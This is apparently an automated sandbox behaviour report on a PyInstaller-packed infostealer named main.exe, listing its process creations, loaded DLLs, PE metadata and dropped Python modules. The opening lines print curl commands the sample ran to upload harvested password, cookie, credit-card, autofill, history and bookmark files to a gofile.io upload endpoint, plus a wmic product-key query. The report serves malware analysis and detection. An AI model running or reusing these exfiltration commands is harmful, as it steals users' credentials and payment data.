Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prpasswords.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path softwarelicensingservice get OA3xOriginalProductKey	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prcookies.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prcreditcards.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prautofills.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prhistories.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prbookmarks.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile	Jump to behavior

Source: C:\Users\user\Desktop\main.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Section loaded: libffi-8.dll	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Section loaded: libcrypto-3.dll	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Section loaded: libssl-3.dll	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Section loaded: sqlite3.dll	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll	Jump to behavior

Source: C:\Users\user\Desktop\main.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\main.exe

Process created: C:\Windows\System32\tasklist.exe tasklist

Source: main.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: main.exe

Static file information: File size 27577634 > 1048576

Source: main.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: main.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: main.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: main.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: main.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: main.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: main.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source: main.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: main.exe, 00000000.00000003.1753253644.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: bossl-modules\legacy.pdb0 source: main.exe, 00000000.00000002.2031067300.0000024BCD638000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2015446644.000001E891469000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: main.exe, 00000000.00000003.1754671215.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: bossl-modules\legacy.pdb source: main.exe, 00000000.00000002.2031067300.0000024BCD638000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2015446644.000001E891469000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: main.exe, 00000000.00000003.1754774783.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_asyncio.pdb source: main.exe, 00000000.00000003.1753335252.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: main.exe, 00000000.00000003.1754774783.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_overlapped.pdb source: main.exe, 00000000.00000003.1754995802.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: main.exe, 00000000.00000003.1753820338.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: main.exe, 00000000.00000003.1753127586.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: main.exe, 00000000.00000003.1753127586.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\python3.pdb source: main.exe, 00000002.00000002.2015409411.000001E891430000.00000002.00000001.01000000.00000006.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_multiprocessing.pdb source: main.exe, 00000000.00000003.1754921734.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdbGCTL source: main.exe, 00000000.00000003.1753253644.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp

Source: main.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: main.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: main.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: main.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: main.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Binary contains a suspicious time stamp

Source: VCRUNTIME140_1.dll.0.dr

Static PE information: 0xFB76EAA0 [Mon Sep 10 13:35:28 2103 UTC]

PE file contains sections with non-standard names

Source: libcrypto-3-x64.dll.0.dr	Static PE information: section name: .00cfg
Source: libcrypto-3.dll.0.dr	Static PE information: section name: .00cfg
Source: libssl-3.dll.0.dr	Static PE information: section name: .00cfg
Source: legacy.dll.0.dr	Static PE information: section name: .00cfg
Source: mfc140u.dll.0.dr	Static PE information: section name: .didat
Source: VCRUNTIME140.dll.0.dr	Static PE information: section name: fothk
Source: VCRUNTIME140.dll.0.dr	Static PE information: section name: _RDATA
Source: python311.dll.0.dr	Static PE information: section name: PyRuntim

Persistence and Installation Behavior

Found pyInstaller with non standard icon

Source: C:\Users\user\Desktop\main.exe

Process created: "C:\Users\user\Desktop\main.exe"

Drops PE files

Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_ARC4.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\_hashlib.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_eksblowfish.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_Salsa20.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\_asyncio.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\zstandard\_cffi.cp311-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\_overlapped.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\_lzma.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_SHA1.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\Pythonwin\win32ui.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\libffi-8.dll	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Protocol\_scrypt.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\_socket.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_chacha20.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_cbc.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_keccak.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_SHA256.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\unicodedata.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_ghash_clmul.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_MD5.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\_ctypes.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\_cffi_backend.cp311-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\_decimal.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_ecb.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\ossl-modules\legacy.dll	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_pkcs1_decode.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_cast.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_poly1305.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\PIL\_webp.cp311-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_des3.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_BLAKE2s.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\zstandard\backend_c.cp311-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_BLAKE2b.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\cryptography\hazmat\bindings\_rust.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_RIPEMD160.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\PublicKey\_curve448.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\select.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\Pythonwin\mfc140u.dll	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_ofb.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\PublicKey\_curve25519.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_des.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_ghash_portable.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\_uuid.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\win32\_win32sysloader.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_aes.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\python3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\PublicKey\_ec_ws.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\PIL\_imagingcms.cp311-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_blowfish.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_arc2.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_ocb.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_MD2.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\psutil\_psutil_windows.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\VCRUNTIME140_1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Math\_modexp.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\_brotli.cp311-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\PIL\_imaging.cp311-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\sqlite3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\_elementtree.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Util\_strxor.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\PIL\_imagingtk.cp311-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\markupsafe\_speedups.cp311-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\pywin32_system32\pywintypes311.dll	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Util\_cpuid_c.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\_ssl.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\win32\win32api.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\win32\win32trace.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_cfb.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\libssl-3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\_bz2.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\_sqlite3.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_aesni.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_SHA384.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\libcrypto-3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\_queue.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\pywin32_system32\pythoncom311.dll	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_MD4.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\charset_normalizer\md.cp311-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\PIL\_imagingmath.cp311-win_amd64.pyd	Jump to dropped file
